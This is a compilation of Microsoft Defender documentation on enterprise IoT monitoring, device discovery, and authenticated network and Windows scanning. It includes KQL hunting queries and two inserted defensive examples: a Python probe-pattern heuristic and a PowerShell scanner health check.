Before you start the procedures in this article, read through Secure IoT devices in the
enterprise to understand more about the integration between Defender for Endpoint
and Defender for IoT.

Make sure that you have:

IoT devices in your network, visible in the Microsoft Defender XDR Device
inventory

Access to the Microsoft Defender Portal as a Security administrator

One of the following licenses:

A Microsoft 365 E5 (ME5) or E5 Security license

Microsoft Defender for Endpoint P2, with an extra, standalone Microsoft
Defender for IoT - EIoT Device License - add-on license, available for purchase
or trial from the Microsoft 365 admin center.

Tip

If you have a standalone license, you don't need to toggle on Enterprise IoT
Security and can skip directly to View added security value in Microsoft
Defender XDR.

For more information, see Enterprise IoT security in Microsoft Defender XDR.

Turn on enterprise IoT monitoring


This procedure describes how to turn on enterprise IoT monitoring in Microsoft
Defender XDR, and is relevant only for ME5/E5 Security customers.

Skip this procedure if you have one of the following types of licensing plans:

Customers with legacy Enterprise IoT pricing plan and an ME5/E5 Security license.
Customers with standalone, per-device licenses added on to Microsoft Defender
for Endpoint P2. In such cases, the Enterprise IoT security setting is turned on as
read-only.

To turn on enterprise IoT monitoring:

1. In Microsoft Defender XDR , select Settings > Device Discovery > Enterprise IoT.

Note

Ensure you have turned on Device Discovery in Settings > Endpoints > Advanced
Features.

2. Toggle the Enterprise IoT security option to On. For example:

View added security value in Microsoft Defender XDR

This procedure describes how to view related alerts, recommendations, and
vulnerabilities for a specific device in Microsoft Defender XDR, when the Enterprise IoT
security option is turned on.

To view added security value:

1. In Microsoft Defender XDR , select Assets > Devices to open the Device
inventory page.

2. Select the IoT devices tab and select a specific device IP to drill down for more
details. For example:

3. On the device details page, explore the following tabs to view data added by the
enterprise IoT security for your device:

On the Alerts tab, check for any alerts triggered by the device. Simulate alerts
in Microsoft 365 Defender for Enterprise IoT using the Raspberry Pi scenario
available in the Microsoft 365 Defender Evaluation & Tutorials page.

You can also set up advanced hunting queries to create custom alert rules.
For more information, see sample advanced hunting queries for Enterprise
IoT monitoring.

On the Security recommendations tab, check for any recommendations
available for the device to reduce risk and maintain a smaller attack surface.

On the Discovered vulnerabilities tab, check for any known CVEs associated
with the device. Known CVEs can help decide whether to patch, remove, or
contain the device and mitigate risk to your network. Alternatively, use
advanced hunting queries to collect vulnerabilities across all your devices.

To hunt for threats:

On the Device inventory page, select Go hunt to query devices using tables like the
DeviceInfo table. On the Advanced hunting page, query data using other schemas.

Sample advanced hunting queries for Enterprise IoT

This section lists sample advanced hunting queries that you can use in Microsoft 365
Defender to help you monitor and secure your IoT devices with Enterprise IoT
security.

Find devices by specific type or subtype


Use the following query to identify devices that exist in your corporate network by type
of device, such as routers:

Kusto

DeviceInfo
| summarize arg_max(Timestamp, *) by DeviceId
| where DeviceType == "NetworkDevice" and DeviceSubtype == "Router"

Find and export vulnerabilities for your IoT devices


Use the following query to list all vulnerabilities on your IoT devices:

Kusto

DeviceInfo
| where DeviceCategory =~ "iot"
| join kind=inner DeviceTvmSoftwareVulnerabilities on DeviceId

For more information, see Advanced hunting and Understand the advanced hunting
schema.

Next steps
Device discovery overview
Manage enterprise IoT monitoring support with Microsoft Defender for IoT
Article • 12/07/2023

Enterprise IoT security monitoring with Defender for IoT is supported by a Microsoft 365
E5 (ME5) or E5 Security license, or extra standalone, per-device licenses purchased as
add-ons to Microsoft Defender for Endpoint.

This article describes how to:

Calculate the devices detected in your environment so that you can understand if
you need extra, standalone licenses.
Cancel support for enterprise IoT monitoring with Microsoft Defender for IoT

If you're looking to manage OT plans, see Manage Defender for IoT plans for OT security
monitoring.

Prerequisites
Before performing the procedures in this article, make sure that you have:

One of the following sets of licenses:

A Microsoft 365 E5 (ME5) or E5 Security license and a Microsoft Defender for
Endpoint P2 license
A Microsoft Defender for Endpoint P2 license alone

For more information, see Enterprise IoT security in Microsoft Defender XDR.

Access to the Microsoft Defender Portal as a Global administrator

Obtain a standalone, Enterprise IoT trial license


This procedure describes how to start using a trial, standalone license for enterprise IoT
monitoring, for customers who have a Microsoft Defender for Endpoint P2 license only.

Customers with ME5/E5 Security plans have support for enterprise IoT monitoring
available on by default, and don't need to start a trial. For more information, see Get
started with enterprise IoT monitoring in Microsoft Defender XDR.

Start your enterprise IoT trial using the Microsoft Defender for IoT - EIoT Device License
- add-on wizard or via the Microsoft 365 admin center.

To start an Enterprise IoT trial:

1. Go to the Microsoft 365 admin center > Marketplace.

2. Search for the Microsoft Defender for IoT - EIoT Device License - add-on and
filter the results by Other services. For example:

Important

The prices shown in this image are for example purposes only and are not
intended to reflect actual prices.

3. Under Microsoft Defender for IoT - EIoT Device License - add-on, select Details.

4. On the Microsoft Defender for IoT - EIoT Device License - add-on page, select
Start free trial. On the Check out page, select Try now.

Tip

Make sure to assign your licenses to specific users to start using them.

For more information, see Free trial.

Calculate monitored devices for Enterprise IoT monitoring

Use the following procedure to calculate how many devices you need to monitor if:

You're an ME5/E5 Security customer and think you need to monitor more devices
than the devices allocated per ME5/E5 Security license
You're a Defender for Endpoint P2 customer who's purchasing standalone
enterprise IoT licenses

To calculate the number of devices you're monitoring:

1. In Microsoft Defender XDR , select Assets > Devices to open the Device
inventory page.

2. Add the total number of devices listed on both the Network devices and IoT
devices tabs.

For example:

3. Round up your total to a multiple of 100 and compare it against the number of
licenses you have.

For example:

In the Microsoft Defender XDR Device inventory, you have 473 network devices
and 1206 IoT devices.
Added together, the total is 1679 devices.
You have 320 ME5 licenses, which cover 1600 devices

You need 79 standalone devices to cover the gap.

For more information, see the Defender for Endpoint Device discovery overview.

Note

Devices listed on the Computers & Mobile tab, including those managed by
Defender for Endpoint or otherwise, are not included in the number of devices
monitored by Defender for IoT.

Purchase standalone licenses
Purchase standalone, per-device licenses if you're an ME5/E5 Security customer who
needs more than the five devices allocated per license, or if you're a Defender for
Endpoint customer who wants to add enterprise IoT security to your organization.

To purchase standalone licenses:

1. Go to the Microsoft 365 admin center Billing > Purchase services. If you don't
have this option, select Marketplace instead.

2. Search for the Microsoft Defender for IoT - EIoT Device License - add-on and
filter the results by Other services. For example:

Important

The prices shown in this image are for example purposes only and are not
intended to reflect actual prices.

3. On the Microsoft Defender for IoT - EIoT Device License - add-on page, enter
your selected license quantity, select a billing frequency, and then select Buy.

For more information, see the Microsoft 365 admin center help.

Turn off enterprise IoT security


This procedure describes how to turn off enterprise IoT monitoring in Microsoft
Defender XDR, and is supported only for customers who don't have any standalone,
per-device licenses added on to Microsoft Defender XDR.

Turn off the Enterprise IoT security option if you're no longer using the service.

To turn off enterprise IoT monitoring:

1. In Microsoft Defender XDR , select Settings > Device discovery > Enterprise IoT.

2. Toggle the option to Off.

You stop getting security value in Microsoft Defender XDR, including purpose-built
alerts, vulnerabilities, and recommendations.

Cancel a legacy Enterprise IoT plan


If you have a legacy Enterprise IoT plan, are not an ME5/E5 Security customer, and no
longer want to use the service, cancel your plan as follows:

1. In Microsoft Defender XDR portal, select Settings > Device discovery >
Enterprise IoT.

2. Select Cancel plan. This page is available only for legacy Enterprise IoT plan
customers.

After you cancel your plan, the integration stops and you'll no longer get added security
value in Microsoft Defender XDR, or detect new Enterprise IoT devices in Defender for
IoT.

The cancellation takes effect one hour after confirming the change. This change appears
on your next monthly statement, and you're charged based on the length of time the
plan was in effect.

Important

If you've registered an Enterprise IoT network sensor (Public preview), device data
collected by the sensor remains in your Microsoft Defender XDR instance. If you're
canceling the Enterprise IoT plan because you no longer need the service, make
sure to manually delete data from Microsoft Defender XDR as needed.

Next steps
For more information, see:

Securing IoT devices in the enterprise
Defender for IoT subscription billing
Manage sensors with Defender for IoT in the Azure portal
Create an additional Azure subscription
Upgrade your Azure subscription
Device discovery frequently asked questions
Article • 08/10/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Important

Some information in this article relates to a prereleased product, which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Find answers to frequently asked questions (FAQs) about device discovery.

What is Basic discovery mode?


This mode allows every Microsoft Defender for Endpoint onboarded device to collect
network data and discover neighboring devices. Onboarded endpoints passively collect
events in the network and extract device information from them. No network traffic is
initiated. Onboarded endpoints extract data from all network traffic seen by an
onboarded device. This data is used to list unmanaged devices in your network.

Can I disable Basic discovery?


You have the option to turn off device discovery through the Advanced features page.
However, you'll lose visibility on unmanaged devices in your network. Note that even if
device discovery is turned off, SenseNDR.exe will still be running on the onboarded
devices.

What is Standard discovery mode?


In this mode, endpoints onboarded to Microsoft Defender for Endpoint can actively
probe observed devices in the network to enrich collected data (with negligible amount
of network traffic). Only devices that were observed by the basic discovery mode are
actively probed in standard mode. This mode is highly recommended for building a
reliable and coherent device inventory. If you choose to disable this mode, and select
Basic discovery mode, you'll likely only gain limited visibility of unmanaged endpoints in
your network.

Standard mode also leverages common discovery protocols that use multicast queries in
the network to find even more devices, in addition to the ones that were observed using
the passive method.

Can I control which devices perform Standard discovery?

You can customize the list of devices that are used to perform Standard discovery. You
can either enable Standard discovery on all the onboarded devices that also support this
capability (currently Windows 10 or later and Windows Server 2019 or later devices only)
or select a subset or subsets of your devices by specifying their device tags. In this case,
all other devices are configured to run Basic discovery only. The configuration is
available in the device discovery settings page.

Can I exclude unmanaged devices from the device inventory list?

Yes, you can apply filters to exclude unmanaged devices from the device inventory list.
You can also use the onboarding status column on API queries to filter out unmanaged
devices.

Which onboarded devices can perform discovery?

Onboarded devices running on Windows 10 version 1809 or later, Windows 11,
Windows Server 2019, or Windows Server 2022 can perform discovery.

What happens if my onboarded device is connected to my home network, or to a public access point?

The discovery engine distinguishes between network events that are received in the
corporate network versus outside of the corporate network. By correlating network
identifiers across all tenant's clients, events are differentiated between ones that were
received from private networks and corporate networks. For example, if most devices in
the organization report that they're connected to the same network name, with the
same default gateway and DHCP server address, it can be assumed that this network is
likely a corporate network. Private network devices won't be listed in the inventory and
won't be actively probed.

What protocols are you capturing and analyzing?

By default, all onboarded devices running on Windows 10 version 1809 or later,
Windows 11, Windows Server 2019, or Windows Server 2022 are capturing and
analyzing the following protocols: ARP, CDP, DHCP, DHCPv6, IP (headers), LLDP, LLMNR,
mDNS, MNDP, MSSQL, NBNS, SSDP, TCP (SYN headers), UDP (headers), WSD

Which protocols do you use for active probing in Standard discovery?

When a device is configured to run Standard discovery, exposed services are being
probed by using the following protocols: ARP, FTP, HTTP, HTTPS, ICMP, LLMNR, NBNS,
RDP, SIP, SMTP, SNMP, SSH, Telnet, UPNP, WSD, SMB, NBSS, IPP, PJL, RPC, mDNS, DHCP,
AFP, CrestonCIP, IphoneSync, WinRM, VNC, SLP, LDAP

In addition, device discovery might also scan other commonly used ports to improve
classification accuracy & coverage.

How can I exclude targets from being probed with Standard discovery?

If there are devices on your network, which shouldn't be actively probed, you can also
define a list of exclusions to prevent them from being scanned. The configuration is
available in the device discovery settings page.

Note

Devices might still reply to multicast discovery attempts in the network. Those
devices will be discovered but won't be actively probed.

Can I exclude devices from being discovered?


As device discovery uses passive methods to discover devices in the network, any device
that communicates with your onboarded devices in the corporate network can be
discovered and listed in the inventory. You can exclude devices from active probing only.

How frequent is the active probing?


Devices are actively probed when changes in device characteristics are observed, to
make sure the existing information is up to date (typically, devices are probed no more
than once in a three-week period).

My security tool raised an alert on UnicastScanner.ps1 / PSScript_{GUID}.ps1 or port scanning activity initiated by it, what should I do?

The active probing scripts are signed by Microsoft and are safe. You can add the
following path to your exclusion list:
C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Downloads\*.ps1

What is the amount of traffic being generated by the Standard discovery active probe?

Active probing can generate up to 50Kb of traffic between the onboarded device and
the probed device, every probing attempt.

Why is there a discrepancy between "can be onboarded" devices in the device inventory, and the number of "devices to onboard" in the dashboard tile?

You may notice differences between the number of listed devices under "can be
onboarded" in the device inventory, "onboard to Microsoft Defender for Endpoint"
security recommendation, and "devices to onboard" dashboard widget.

The security recommendation and the dashboard widget are for devices that are stable
in the network, excluding ephemeral devices, guest devices, and others. The idea is to
recommend persistent devices that also affect the overall security score of the
organization.

Can I onboard unmanaged devices that were found?

Yes. You can onboard unmanaged devices manually. Unmanaged endpoints in your
network introduce vulnerabilities and risks to your network. Onboarding them to the
service can increase the security visibility on them.

I've noticed that unmanaged device health state is always "Active", why is that?

Temporarily, unmanaged device health state is "Active" during the standard retention
period of the device inventory, regardless of their actual state.

Does standard discovery look like malicious network activity?

When considering Standard discovery, you may be wondering about the implications of
probing, and specifically whether security tools might suspect such activity as malicious.
The following subsection explains why, in almost all cases, organizations should have no
concerns around enabling Standard discovery.

Probing is distributed across all Windows devices on the network

As opposed to malicious activity, which would typically scan the entire network from a
few compromised devices, Microsoft Defender for Endpoint's Standard discovery
probing is initiated from all onboarded Windows devices, making the activity benign and
non-anomalous. The probing is centrally managed from the cloud to balance the
probing attempts between all the supported onboarded devices in the network.

Active probing generates a negligible amount of extra traffic

Unmanaged devices would typically get probed no more than once in a three-week
period and generate less than 50KB of traffic. Malicious activity usually includes highly
repetitive probing attempts and in some cases data exfiltration that generates a
significant amount of network traffic that can be identified as an anomaly by network
monitoring tools.

Your Windows device already runs active discovery


Active discovery capabilities have always been embedded in the Windows operating
system, to find nearby devices, endpoints, and printers, for easier "plug and play"
experiences and file sharing between endpoints in the network. Similar functionality is
implemented in mobile devices, network equipment and inventory applications just to
name a few.

Standard discovery uses the same discovery methods to identify devices and to have a
unified visibility for all the devices in your network in the Microsoft Defender XDR
Device Inventory. For example – Standard discovery identifies nearby endpoints in the
network the same way Windows lists available printers in the network.

Network security and monitoring tools are indifferent to such activities performed by
devices on the network.

Only unmanaged devices are being probed


The device discovery capabilities have been built to only discover and identify
unmanaged devices on your network. This means that previously discovered devices
that are already onboarded with Microsoft Defender for Endpoint won't be probed.

You can exclude network lures from active probing


Standard discovery supports exclusion of devices or ranges (subnets) from active
probing. If you have network lures deployed in place, you can use the Device Discovery
settings to define exclusions based on IP addresses or subnets (a range of IP addresses).
Defining those exclusions ensures that those devices won't be actively probed and won't
be alerted on. Those devices are discovered using passive methods only (similar to Basic
discovery mode).
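As an added illustration of the distinction this section draws (not Microsoft's code, and not a Defender feature), the following Python triage heuristic scores constructed probe records against the profile described above: many sources each touching a few targets, under 50 KB per probe, and no target re-probed within three weeks. The 10-target threshold, the host names and the record format are constructed.

```python
"""Added triage heuristic (not Microsoft's code): does observed probing look like the
distributed, low-volume, infrequent pattern this section describes, or like a few
hosts sweeping the network? Records are constructed; the 50KB and three-week
figures come from the page, the target-count threshold is constructed."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone

MAX_PROBE_BYTES = 50 * 1024                # page: less than 50KB per probing attempt
MIN_REPROBE_INTERVAL = timedelta(days=21)  # page: no more than once in three weeks
MAX_TARGETS_PER_SOURCE = 10                # constructed threshold; tune per segment
T0 = datetime(2024, 1, 1, tzinfo=timezone.utc)


def probe(day, src, dst, nbytes):
    """One constructed 'src probed dst' record, e.g. reduced from a flow log."""
    return {"ts": T0 + timedelta(days=day), "src": src, "dst": dst, "bytes": nbytes}


# Constructed: twelve onboarded workstations each probe one printer once, ws-03 also
# probes a camera; ws-99 sweeps forty hosts with large transfers and repeats a day later.
BENIGN = [probe(i % 5, f"ws-{i:02d}", f"printer-{i % 4}", 12_000) for i in range(12)]
BENIGN.append(probe(6, "ws-03", "cam-1", 9_000))
SCANNER = [probe(day, "ws-99", f"host-{i}", 70_000) for day in (1, 2) for i in range(40)]
SAMPLE = BENIGN + SCANNER


def per_source_findings(records):
    """Return {src: [reasons]} for sources that break the benign profile: too many
    distinct targets, an oversized probe, or the same target probed again too soon."""
    by_src = defaultdict(list)
    for r in records:
        by_src[r["src"]].append(r)
    findings = {}
    for src, recs in by_src.items():
        reasons = []
        targets = {r["dst"] for r in recs}
        if len(targets) > MAX_TARGETS_PER_SOURCE:
            reasons.append(f"{len(targets)} distinct targets")
        if any(r["bytes"] > MAX_PROBE_BYTES for r in recs):
            reasons.append("probe larger than 50 KB")
        last_seen = {}
        for r in sorted(recs, key=lambda x: x["ts"]):
            prev = last_seen.get(r["dst"])
            if prev is not None and r["ts"] - prev < MIN_REPROBE_INTERVAL:
                reasons.append(f"{r['dst']} re-probed within 21 days")
                break
            last_seen[r["dst"]] = r["ts"]
        if reasons:
            findings[src] = reasons
    return findings


def top_source_share(records):
    """(source, fraction of all probes it generated). Standard discovery spreads probes
    over all onboarded hosts, so no single source should dominate."""
    counts = Counter(r["src"] for r in records)
    src, n = counts.most_common(1)[0]
    return src, n / len(records)


if __name__ == "__main__":
    for src, reasons in per_source_findings(SAMPLE).items():
        print(src, "->", "; ".join(reasons))
    src, share = top_source_share(SAMPLE)
    print(f"top source: {src} with {share:.0%} of probes")
```

On the constructed data the twelve workstations produce no findings and no single one of them exceeds a fifth of the probes, while ws-99 is flagged on all three criteria and accounts for most of the traffic.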



Network device discovery and vulnerability management
Article • 04/06/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Defender Vulnerability Management
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

The Network device discovery and vulnerability assessments Blog (published
04-13-2021) provides insights into the new Network device discovery capabilities
in Defender for Endpoint. This article provides an overview of the challenge that
Network device discovery is designed to address, and detailed information about
how to get started using these new capabilities.

Network discovery capabilities are available in the Device inventory section of the
Microsoft Defender portal and Microsoft Defender XDR consoles.

A designated Microsoft Defender for Endpoint device is used on each network segment
to perform periodic authenticated scans of preconfigured network devices. Once
discovered, Defender for Endpoint's Vulnerability Management capabilities provide
integrated workflows to secure discovered switches, routers, WLAN controllers, firewalls,
and VPN gateways.

Once the network devices are discovered and classified, security administrators are able
to receive the latest security recommendations and review recently discovered
vulnerabilities on network devices deployed across their organizations.

Approach
Network devices aren't managed as standard endpoints since Defender for Endpoint
doesn't have a sensor built into the network devices themselves. These types of devices
require an agentless approach where a remote scan obtains the necessary information
from the devices. Depending on the network topology and characteristics, a single
device or a few devices onboarded to Microsoft Defender for Endpoint perform
authenticated scans of network devices using SNMP (read-only).

There are two types of devices to keep in mind:

Scanning device: A device that's already onboarded that you use to scan the
network devices.
Network devices: The network devices you plan to scan and onboard.

Vulnerability management for network devices

Once the network devices are discovered and classified, security administrators are able
to receive the latest security recommendations and review recently discovered
vulnerabilities on network devices deployed across their organizations.

Operating systems that are supported

The following operating systems are currently supported:

Cisco IOS, IOS-XE, NX-OS
Fortinet FortiOS
Juniper JUNOS
HPE Aruba Networking ArubaOS, AOS-CX
HPE ArubaOS, Procurve Switch Software
Palo Alto Networks PAN-OS

More networking vendors and OS will be added over time, based on data gathered from
customer usage. Therefore, you're encouraged to configure all your network devices,
even if they're not specified in this list.

How to get started

Your first step is to select a device that performs the authenticated network scans.

1. Decide on a Defender for Endpoint onboarded device (client or server) that has a
network connection to the management port for the network devices you plan on
scanning.

2. SNMP traffic between the Defender for Endpoint scanning device and the targeted
network devices must be allowed (for example, by the Firewall).
3. Decide which network devices will be assessed for vulnerabilities (for example: a
Cisco switch or a Palo Alto Networks firewall).

4. Make sure SNMP read-only is enabled on all configured network devices to allow
the Defender for Endpoint scanning device to query the configured network
devices. 'SNMP write' isn't needed for the proper functionality of this feature.

5. Obtain the IP addresses of the network devices to be scanned (or the subnets
where these devices are deployed).

6. Obtain the SNMP credentials of the network devices (for example: Community
String, noAuthNoPriv, authNoPriv, authPriv). You're required to provide the
credentials when configuring a new scan job.

7. Proxy client configuration: No extra configuration is required other than the
Defender for Endpoint device proxy requirements.

8. To allow the scanner to be authenticated and work properly, it's essential that you
add the following domains/URLs:

login.windows.net
*.security.microsoft.com
login.microsoftonline.com
*.blob.core.windows.net/networkscannerstable/*

Note

Not all URLs are specified in the Defender for Endpoint documented list of
allowed data collection.

Permissions
To configure scan jobs, the following user permission option is required: Manage
security settings in Defender. You can find the permission by going to Settings > Roles.
For more information, see Create and manage roles for role-based access control.

Windows version prerequisite for the scanner

The scanner is supported on Windows 10, version 1903 and Windows Server, version
1903 and later. For more information, see Windows 10, version 1903 and Windows
Server, version 1903.

Note

There's a limit of 40 scanner installations per tenant.

Install the scanner

1. Go to Microsoft 365 security > Settings > Device discovery > Authenticated
scans.

2. Download the scanner and install it on the designated Defender for Endpoint
scanning device.

Scanner installation & registration

The sign-in process can be completed on the designated scanning device itself or
any other device (for example, your personal client device).

Note

Both the account the user signs in with and the device being used to complete the
sign-in process must be in the same tenant where the device is onboarded to
Microsoft Defender for Endpoint.

To complete the scanner registration process:

1. Copy and follow the URL that appears on the command line and use the provided
installation code to complete the registration process.

Note

You may need to change Command Prompt settings to be able to copy the URL.

2. Enter the code and sign in using a Microsoft account that has the Defender for
Endpoint permission called "Manage security settings in Defender."

3. When finished, you should see a message confirming you've signed in.

Updates for scanner

The scanner has a scheduled task that, by default, is configured to look for updates
regularly. When the task runs, it compares the version of the scanner on the client
device to the version of the agent on the update location. The update location is where
Windows looks for updates, such as on a network share or from the internet.

If there's a difference between the two versions, the update process determines which
files are different and need to be updated on the local computer. Once the required
updates are determined, the downloading of the updates will start.

It's possible to disable automatic updates of the scanner by going to the MDATP
Network Scanner Updater inside the Windows Task Scheduler. To do this:

In Windows, go to Computer Management > Task Scheduler > Task Scheduler Library.
Select MDATP Network Scanner Updater > right-click > and select Disable.
To re-enable, right-click on MDATP Network Scanner Updater and select Enable.

Configure a new network device authenticated scan

1. Go to Settings > Device discovery > Authenticated scans in the Microsoft
Defender portal.

2. Select Add new scan and choose Network device authenticated scan and select
Next.

3. Choose whether to Activate scan.

4. Enter a Scan name.

5. Select the Scanning device: The onboarded device you use to scan the network
devices.

6. Enter the Target (range): The IP address ranges or hostnames you want to scan.
You can either enter the addresses or import a CSV file. Importing a file overrides
any manually added addresses.

7. Select the Scan interval: By default, the scan runs every four hours; you can
change the scan interval or have it run only once by selecting 'Don't repeat'.

8. Choose your Authentication method.

You can select Use Azure KeyVault for providing credentials: If you
manage your credentials in Azure KeyVault, you can enter the Azure KeyVault
URL and Azure KeyVault secret name to be accessed by the scanning device
to provide credentials. The secret value depends on the authentication
method you choose:

Authentication method    Azure KeyVault secret value
AuthPriv                 Username;AuthPassword;PrivPassword
AuthNoPriv               Username;AuthPassword
CommunityString          CommunityString

9. Select Next to run or skip the test scan.

10. Select Next to review the settings and then select Submit to create your new
network device authenticated scan.

Note

To prevent device duplication in the network device inventory, make sure each IP
address is configured only once across multiple scanning devices.

Scan and add network devices

During the set-up process, you can perform a one time test scan to verify that:

There's connectivity between the Defender for Endpoint scanning device and the
configured target network devices.
The configured SNMP credentials are correct.

Each scanning device can support up to 1,500 successfully scanned IP addresses. For
example, if you scan 10 different subnets where only 100 IP addresses return
successful results, you'll be able to scan 1,400 additional IP addresses from other
subnets on the same scanning device.

If there are multiple IP address ranges/subnets to scan, the test scan results take several
minutes to show up. A test scan is available for up to 1,024 addresses.

Once the results show up, you can choose which devices will be included in the periodic
scan. If you skip viewing the scan results, all configured IP addresses are added to the
network device authenticated scan (regardless of the device's response). The scan
results can also be exported.

Device inventory
Newly discovered devices are shown under the new Network devices tab in the Device
inventory page. It may take up to two hours after adding a scanning job until the
devices are updated.

Troubleshooting

Scanner installation has failed

Verify that the required URLs are added to the allowed domains in your firewall settings.
Also, make sure proxy settings are configured as described in Configure device proxy
and Internet connectivity settings.

The Microsoft.com/devicelogin web page did not show up

Verify that the required URLs are added to the allowed domains in your firewall. Also,
make sure proxy settings are configured as described in Configure device proxy and
Internet connectivity settings.

Network devices are not shown in the device inventory after several hours

The scan results should be updated a few hours after the initial scan that took place
after completing the network device authenticated scan configuration.

If devices are still not shown, verify that the 'MdatpNetworkScanService' service is
running on the device on which you installed the scanner, and perform a "Run scan"
in the relevant network device authenticated scan configuration.

If you still don't get results after 5 minutes, restart the service.

Devices last seen time is longer than 24 hours

Validate that the scanner is running properly. Then go to the scan definition and select
"Run test." Check what error messages are returning from the relevant IP addresses.

My scanner is configured but scans aren't running

As the authenticated scanner currently uses an encryption algorithm that isn't compliant
with Federal Information Processing Standards (FIPS), the scanner can't operate when an
organization enforces the use of FIPS compliant algorithms.

To allow algorithms that aren't compliant with FIPS, set the following value in the
registry for the devices where the scanner will run:

Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy
with a DWORD value named Enabled and value of 0x0

FIPS compliant algorithms are only used in relation to departments and agencies of the
United States federal government.
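As an added example (it is not from this article, nor code shipped with the scanner), the following PowerShell function runs the checks the troubleshooting sections above describe on the scanning device: the MdatpNetworkScanService state, the MDATP Network Scanner Updater task, the FipsAlgorithmPolicy registry value, the Windows build prerequisite, and HTTPS reachability of the required domains. The function name and the mapping of version 1903 to build 18362 are my own; run it in an elevated Windows PowerShell window.

```powershell
# Added troubleshooting helper; it is not part of the Microsoft documentation or of the scanner.
# Run it in an elevated Windows PowerShell window on the designated scanning device.
# The 'MdatpNetworkScanService' service, the 'MDATP Network Scanner Updater' task and the
# FipsAlgorithmPolicy\Enabled value are the names given in the troubleshooting text.
function Test-MdeNetworkScannerHealth {
    [CmdletBinding()]
    param (
        # Start the scanner service if it is installed but not running (the "restart the service" step).
        [switch]$RestartService
    )

    $findings = [System.Collections.Generic.List[object]]::new()
    function Add-Finding($Check, $Ok, $Detail) {
        $findings.Add([pscustomobject]@{ Check = $Check; Ok = [bool]$Ok; Detail = $Detail })
    }

    # 1. Windows prerequisite: version 1903 of Windows 10 / Windows Server is build 18362.
    $build = [System.Environment]::OSVersion.Version.Build
    Add-Finding 'Windows build 18362 (version 1903) or later' ($build -ge 18362) "build $build"

    # 2. Scanner service state.
    $svc = Get-Service -Name 'MdatpNetworkScanService' -ErrorAction SilentlyContinue
    if ($null -eq $svc) {
        Add-Finding 'MdatpNetworkScanService installed' $false 'service not found; re-run the scanner installer'
    } else {
        if ($svc.Status -ne 'Running' -and $RestartService) {
            Restart-Service -Name $svc.Name -ErrorAction SilentlyContinue
            $svc.Refresh()
        }
        Add-Finding 'MdatpNetworkScanService running' ($svc.Status -eq 'Running') "status $($svc.Status)"
    }

    # 3. Auto-update task: report whether it exists and whether it has been disabled.
    $task = Get-ScheduledTask -TaskName 'MDATP Network Scanner Updater' -ErrorAction SilentlyContinue
    $taskDetail = if ($task) { "state $($task.State)" } else { 'task not found' }
    Add-Finding 'MDATP Network Scanner Updater task present' ($null -ne $task) $taskDetail

    # 4. FIPS policy: the scanner cannot operate while Enabled is 1.
    $fipsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy'
    $fips = (Get-ItemProperty -Path $fipsKey -Name Enabled -ErrorAction SilentlyContinue).Enabled
    Add-Finding 'FIPS-only algorithms not enforced' ($fips -ne 1) "Enabled = $fips (must be 0x0 or absent)"

    # 5. Required endpoints over HTTPS. Invoke-WebRequest uses the system proxy settings, which a
    #    raw TCP test would bypass. The wildcard *.security.microsoft.com is probed via its apex host;
    #    the *.blob.core.windows.net/networkscannerstable/* location has no fixed host and is skipped.
    foreach ($h in 'login.windows.net', 'login.microsoftonline.com', 'security.microsoft.com') {
        try {
            Invoke-WebRequest -Uri "https://$h/" -Method Head -UseBasicParsing -TimeoutSec 10 | Out-Null
            $reachable = $true; $detail = 'HTTP response received'
        } catch {
            # Any HTTP status, even 4xx, proves the host answered; no response at all means it is blocked.
            $reachable = $null -ne $_.Exception.Response
            $detail = if ($reachable) { "HTTP $([int]$_.Exception.Response.StatusCode)" } else { $_.Exception.Message }
        }
        Add-Finding "HTTPS to $h" $reachable $detail
    }

    return $findings
}

Test-MdeNetworkScannerHealth | Format-Table -AutoSize
```

A row with Ok = False points at the matching troubleshooting entry above; pass -RestartService to have the function start a stopped scanner service before reporting.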

Required Defender Vulnerability Management user permission

Registration finished with an error: "It looks like you don't have sufficient permissions for
adding a new agent. The required permission is 'Manage security settings in Defender'."

Press any key to exit.

Ask your system administrator to assign you the required permissions. Alternately, ask
another relevant member to help you with the sign-in process by providing them with
the sign-in code and link.

Registration process fails using the provided link in the command line during the
registration process

Try a different browser or copy the sign-in link and code to a different device.

Text too small or can't copy text from command line

Change command-line settings on your device to allow copying and change text size.

Related articles
Device inventory
Windows authenticated scan



Authenticated scan for Windows
Article • 11/15/2023

Applies to:

Microsoft Defender Vulnerability Management
Microsoft Defender XDR
Microsoft Defender for Servers Plan 2

Note

To use this feature you'll require Microsoft Defender Vulnerability Management
Standalone or, if you're already a Microsoft Defender for Endpoint Plan 2 customer,
the Defender Vulnerability Management add-on.

Authenticated scan for Windows provides the ability to run scans on unmanaged
Windows devices. You can remotely target by IP ranges or hostnames and scan
Windows services by providing Microsoft Defender Vulnerability Management with
credentials to remotely access the devices. Once configured, the targeted unmanaged
devices will be scanned regularly for software vulnerabilities. By default, the scan
will run every four hours, with options to change this interval or have it only run once.

Security administrators can then see the latest security recommendations and review
recently discovered vulnerabilities for the targeted device in the Microsoft Defender
portal.

Tip

Did you know you can try all the features in Microsoft Defender Vulnerability
Management for free? Find out how to sign up for a free trial.

Scanner Installation
Similar to network device authenticated scan, you'll need a scanning device with the
scanner installed. If you don't already have the scanner installed, see Install the scanner
for steps on how to download and install it.

Note
No changes are required for pre-existing installed scanners.

Prerequisites
The following section lists the prerequisites you need to configure to use Authenticated
scan for Windows.

Scanning account
A scanning account is required to remotely access the devices. This must be a Group
Managed Service Account (gMSA).

Note

We recommend the gMSA account is a least privileged account with only the
required scanning permissions and is set to cycle the password regularly.

To create a gMSA account:

1. On your domain controller in a PowerShell window, run:

PowerShell

New-ADServiceAccount -Name gmsa1 -PrincipalsAllowedToRetrieveManagedPassword scanner-win11-i$ -KerberosEncryptionType RC4, AES128, AES256 -Verbose

gmsa1 stands for the name of the account you're creating, and scanner-win11-i$
stands for the machine account of the machine where the scanner agent will run.
Only this machine will be able to retrieve the account password. You can provide
a comma-separated list of machines.
